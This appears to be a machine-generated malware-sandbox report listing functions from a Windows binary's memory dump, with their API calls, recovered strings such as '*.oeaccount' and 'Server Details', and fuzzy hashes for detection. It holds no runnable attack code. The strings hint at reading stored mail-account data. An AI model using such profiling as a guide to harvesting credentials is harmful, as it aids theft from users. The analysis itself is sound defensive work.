Uniqueness Score: -1.00%

Function 0040B340, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42

strlen.MSVCRT ref: 0040B366
atoi.MSVCRT ref: 0040B374
_mbsicmp.MSVCRT ref: 0040B3C7
_mbsicmp.MSVCRT ref: 0040B3DA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbsicmp$??2@??3@atoistrlen
String ID:
API String ID: 4107816708-0
Opcode ID: 50902c72e53fe8595ed8da47588c32d88404b38a68d67d16a4cd5963c10557fb
Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
Opcode Fuzzy Hash: 50902c72e53fe8595ed8da47588c32d88404b38a68d67d16a4cd5963c10557fb
Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00410D1D, Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410D7C
_gmtime64.MSVCRT ref: 00410DA5
memcpy.MSVCRT ref: 00410DB9
strftime.MSVCRT ref: 00410DE4

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
String ID:
API String ID: 1886415126-0
Opcode ID: 42ebb8c1e295c4f998c750dd4381f5a90e4aefd148bac4d8b35948d96f151cd4
Instruction ID: e7bf39f2df778c647ef491fd25a44dd6e6c3fbccc626bed7fedf127605a46aa4
Opcode Fuzzy Hash: 42ebb8c1e295c4f998c750dd4381f5a90e4aefd148bac4d8b35948d96f151cd4
Instruction Fuzzy Hash: 8B21F3729003156BD310EF65D846B9BB7E8AF48324F044A1FFA98D7281DB78E9848BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00443946, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00443953

Strings

>, xrefs: 00443979
>, xrefs: 004439B4
>, xrefs: 0044398E

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: strlen
String ID: >$>$>
API String ID: 39653677-3911187716
Opcode ID: 72397ee1c43d632453e656b33846a456de9a41f90afbba8be60ca1687f87a252
Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
Opcode Fuzzy Hash: 72397ee1c43d632453e656b33846a456de9a41f90afbba8be60ca1687f87a252
Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A

Uniqueness

Uniqueness Score: -1.00%

Function 00443946, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00443953

Strings

>, xrefs: 004439B4
>, xrefs: 00443979
>, xrefs: 0044398E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen
String ID: >$>$>
API String ID: 39653677-3911187716
Opcode ID: 7d20a18d7a2fffdac5ba5617d09767eef89d9f83b9fad879c3f6283c88f33b8e
Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
Opcode Fuzzy Hash: 7d20a18d7a2fffdac5ba5617d09767eef89d9f83b9fad879c3f6283c88f33b8e
Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A

Uniqueness

Uniqueness Score: -1.00%

Function 00424E15, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00424E4D
memcpy.MSVCRT ref: 00424E68

Strings

statement aborts at %d: [%s] %s, xrefs: 0042525A
JHA, xrefs: 00425E16
out of memory, xrefs: 00425E19

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: JHA$out of memory$statement aborts at %d: [%s] %s
API String ID: 3510742995-1664285505
Opcode ID: c64ad1b7a5c0a95365087d6c5deb20f9aedac53dcfb19aa7c7e0f46d3cd8f12e
Instruction ID: ec3f5eea383d1f0f7cc801b227e1d4d3754830409aefe4b61b7f181b495924c7
Opcode Fuzzy Hash: c64ad1b7a5c0a95365087d6c5deb20f9aedac53dcfb19aa7c7e0f46d3cd8f12e
Instruction Fuzzy Hash: 2021BB32A00614EFDB24DBA8D841A9EBBF1FF48314F10009AE508A7291D779E990CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004076FD, Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00407709
??3@YAXPAX@Z.MSVCRT ref: 00407729

Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B

??3@YAXPAX@Z.MSVCRT ref: 0040774C
memcpy.MSVCRT ref: 0040776C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$memcpy$mallocstrlen
String ID:
API String ID: 1171893557-0
Opcode ID: 5a728dae3c8c340d401125afcd4c8680a2fa5bf69a889e80920912f063c18ec5
Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
Opcode Fuzzy Hash: 5a728dae3c8c340d401125afcd4c8680a2fa5bf69a889e80920912f063c18ec5
Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407D33, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00407D68
memset.MSVCRT ref: 00407D79
memcpy.MSVCRT ref: 00407D85
??3@YAXPAX@Z.MSVCRT ref: 00407D92

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 872aa7d39a6b2f652531c2f1d24dade4a88e39d8face8cd0d9c8ed6b9a35d079
Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
Opcode Fuzzy Hash: 872aa7d39a6b2f652531c2f1d24dade4a88e39d8face8cd0d9c8ed6b9a35d079
Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00410880, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00410890
SHBrowseForFolder.SHELL32(?), ref: 004108C2
SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
_mbscpy.MSVCRT ref: 004108E9

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPath_mbscpy
String ID:
API String ID: 1479990042-0
Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B65E, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00408B27: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408BF0
Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F

sprintf.MSVCRT ref: 0040B684
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7

Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0

sprintf.MSVCRT ref: 0040B6AE
_mbscat.MSVCRT ref: 0040B6C1

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
String ID:
API String ID: 203655857-0
Opcode ID: 4122b5d329f0bef8ed7c67869eb41ffad0da3a92ea72a54accba5408fcaa86aa
Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
Opcode Fuzzy Hash: 4122b5d329f0bef8ed7c67869eb41ffad0da3a92ea72a54accba5408fcaa86aa
Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB21, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AB44
memset.MSVCRT ref: 0040AB5A

Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D

sprintf.MSVCRT ref: 0040AB84

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

Strings

</%s>, xrefs: 0040AB7E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: </%s>
API String ID: 3699762281-259020660
Opcode ID: 6f49f65094e7ad20563e423a9375ab60d237aa31118833911ccdf35c2fa2a86b
Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
Opcode Fuzzy Hash: 6f49f65094e7ad20563e423a9375ab60d237aa31118833911ccdf35c2fa2a86b
Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417F87, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 00417026: memcmp.MSVCRT ref: 004170E8

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041809C

Strings

recovered %d pages from %s, xrefs: 004181E0

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
String ID: recovered %d pages from %s
API String ID: 985450955-1623757624
Opcode ID: 046dec29b20a0b7230403658f41cd55b20719525ee52f21c2626d9d53d47d0d2
Instruction ID: 8cbc4ab102da2e195dd9e93f7cc9c8da370606533bae9fcdbaff4d8649daaf64
Opcode Fuzzy Hash: 046dec29b20a0b7230403658f41cd55b20719525ee52f21c2626d9d53d47d0d2
Instruction Fuzzy Hash: 7981A076900604AFDF21CB68C880AEFB7F5AF88314F15441EE95597341DB39A986CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004021F6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

_ultoa.MSVCRT ref: 0040225B
sprintf.MSVCRT ref: 004022CF

Strings

%s %s %s, xrefs: 004022C9

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _ultoasprintf
String ID: %s %s %s
API String ID: 432394123-3850900253
Opcode ID: 83da732085abb5c1b1bfcd07ba1e19e1c96f71f81e02b5871a6b8f1e5a5d5de2
Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
Opcode Fuzzy Hash: 83da732085abb5c1b1bfcd07ba1e19e1c96f71f81e02b5871a6b8f1e5a5d5de2
Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD58, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42

GetStdHandle.KERNEL32(000000F5,00000000,00000000,0044551F,0044551F,?,0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?), ref: 0040AD80
CloseHandle.KERNEL32(00000000,0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?,?,0040CD7F), ref: 0040AE78
SetCursor.USER32(0040CC56,0044551F,00000000,00000000,?,00000000,00000000,?,?,?,0040CD7F), ref: 0040AE84

Part of subcall function 00406AB8: CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040AD7B,00000000,00000000,00000000,0044551F,0044551F,?,0040CC56,0044551F), ref: 00406ACA

Strings

Mxt, xrefs: 0040AE45, 0040AE54

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Handle$??2@??3@CloseCreateCursorFile
String ID: Mxt
API String ID: 4067408976-3818084670
Opcode ID: a36a877aa523ef07b8084e578a7b845c2168ca290b28fe380094649eaf73971f
Instruction ID: 07094401e833ed2274f64417c5690acc5e7925ac7acb0c0ebc52fba726e3a108
Opcode Fuzzy Hash: a36a877aa523ef07b8084e578a7b845c2168ca290b28fe380094649eaf73971f
Instruction Fuzzy Hash: F3415131740200AFCB259F69C888E5E7BF6AF45711F25406AF446A73E1C7389D90CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004095D9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101A,00000000,?), ref: 00409655

Strings

lD, xrefs: 004095E5
", xrefs: 0040963F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend
String ID: "$lD
API String ID: 3850602802-3281613384
Opcode ID: 4b904691b5c918cf61e749542f30e01049ce81fe27a5be6eabc972c01c7eee2d
Instruction ID: 4330ad5c46c1125b17808f97a024c0297777867a6b1a918becbcc9421b7f13c5
Opcode Fuzzy Hash: 4b904691b5c918cf61e749542f30e01049ce81fe27a5be6eabc972c01c7eee2d
Instruction Fuzzy Hash: CA11A071A006049ECB149F66C8D08BEB7F9FB94308B10883FD096E7282C7799D82CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004086A5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1

GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3

Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6

Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306

CloseHandle.KERNEL32(?,?), ref: 0040870D

Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683

Strings

C@, xrefs: 004086A5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: File$??3@$??2@CloseCreateHandleReadSize
String ID: C@
API String ID: 1449862175-3201871010
Opcode ID: 92abf9dbbd4dfb48846a4ff60d59a2d43eb142c3fb78a89c8fbbacc06cb7bc7b
Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
Opcode Fuzzy Hash: 92abf9dbbd4dfb48846a4ff60d59a2d43eb142c3fb78a89c8fbbacc06cb7bc7b
Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407211, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00407269

Strings

L, xrefs: 00407235
ini, xrefs: 00407254

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy
String ID: L$ini
API String ID: 714388716-4234614086
Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99

Uniqueness

Uniqueness Score: -1.00%

Function 0041104F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00411058
_msize.MSVCRT ref: 0041106D

Strings

failed memory resize %u to %u bytes, xrefs: 00411074

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _msizerealloc
String ID: failed memory resize %u to %u bytes
API String ID: 2713192863-2134078882
Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A

Uniqueness

Uniqueness Score: -1.00%

Function 00408DE1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000), ref: 00408DE9
sprintf.MSVCRT ref: 00408E0C

Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC

Strings

menu_%d, xrefs: 00408E02

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
String ID: menu_%d
API String ID: 1129539653-2417748251
Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE

Uniqueness

Uniqueness Score: -1.00%

Function 00409570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104,?), ref: 00406D3F

strrchr.MSVCRT ref: 00409579
_mbscat.MSVCRT ref: 0040958E

Strings

_lng.ini, xrefs: 00409588

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileModuleName_mbscatstrrchr
String ID: _lng.ini
API String ID: 3334749609-1948609170
Opcode ID: cbeadcb365c5e1059abcdd69aa521e3befff016931b47f237a8ed2b0a3b7c0c9
Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
Opcode Fuzzy Hash: cbeadcb365c5e1059abcdd69aa521e3befff016931b47f237a8ed2b0a3b7c0c9
Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF

Uniqueness

Uniqueness Score: -1.00%

Function 00406AD1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15filestringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00406ADE
WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

Strings

Mxt, xrefs: 00406AD7, 00406ADA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWritestrlen
String ID: Mxt
API String ID: 672350951-3818084670
Opcode ID: 57a20f3d3bb3d83254ac0c6d80dd0e281369b00d179537be02cc216618ddd521
Instruction ID: 89e3f7f71ee31650871560f1fca52baac75f7e4c408bc1c829eeff902eeca580
Opcode Fuzzy Hash: 57a20f3d3bb3d83254ac0c6d80dd0e281369b00d179537be02cc216618ddd521
Instruction Fuzzy Hash: 91D0C97541010CBFEF01AF41EC07EA93B6DEB05655F108065B90489061EBB2AE549BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00406E89

Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B

_mbscat.MSVCRT ref: 00406E98

Strings

sqlite3.dll, xrefs: 00406E81

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$_mbscpystrlen
String ID: sqlite3.dll
API String ID: 1983510840-1155512374
Opcode ID: e9aa28a1aba75e1ed8dd627c1ecc989c913cd1d7d34d9111dace04d596deddf2
Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
Opcode Fuzzy Hash: e9aa28a1aba75e1ed8dd627c1ecc989c913cd1d7d34d9111dace04d596deddf2
Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB

Uniqueness

Uniqueness Score: -1.00%

Function 004033A2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA

Strings

34@, xrefs: 004033A8
Server Details, xrefs: 004033B5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString
String ID: 34@$Server Details
API String ID: 1096422788-1041202369
Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE74, Relevance: 5.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042BF32
memcpy.MSVCRT ref: 0042BF68
memset.MSVCRT ref: 0042BF83
memcpy.MSVCRT ref: 0042BFBF

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 59b7fd977eb1c2fd49e1d36b82f6177f4ded24ca5a0d28f81347046e6f9a1009
Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
Opcode Fuzzy Hash: 59b7fd977eb1c2fd49e1d36b82f6177f4ded24ca5a0d28f81347046e6f9a1009
Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 004081FD, Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040820C
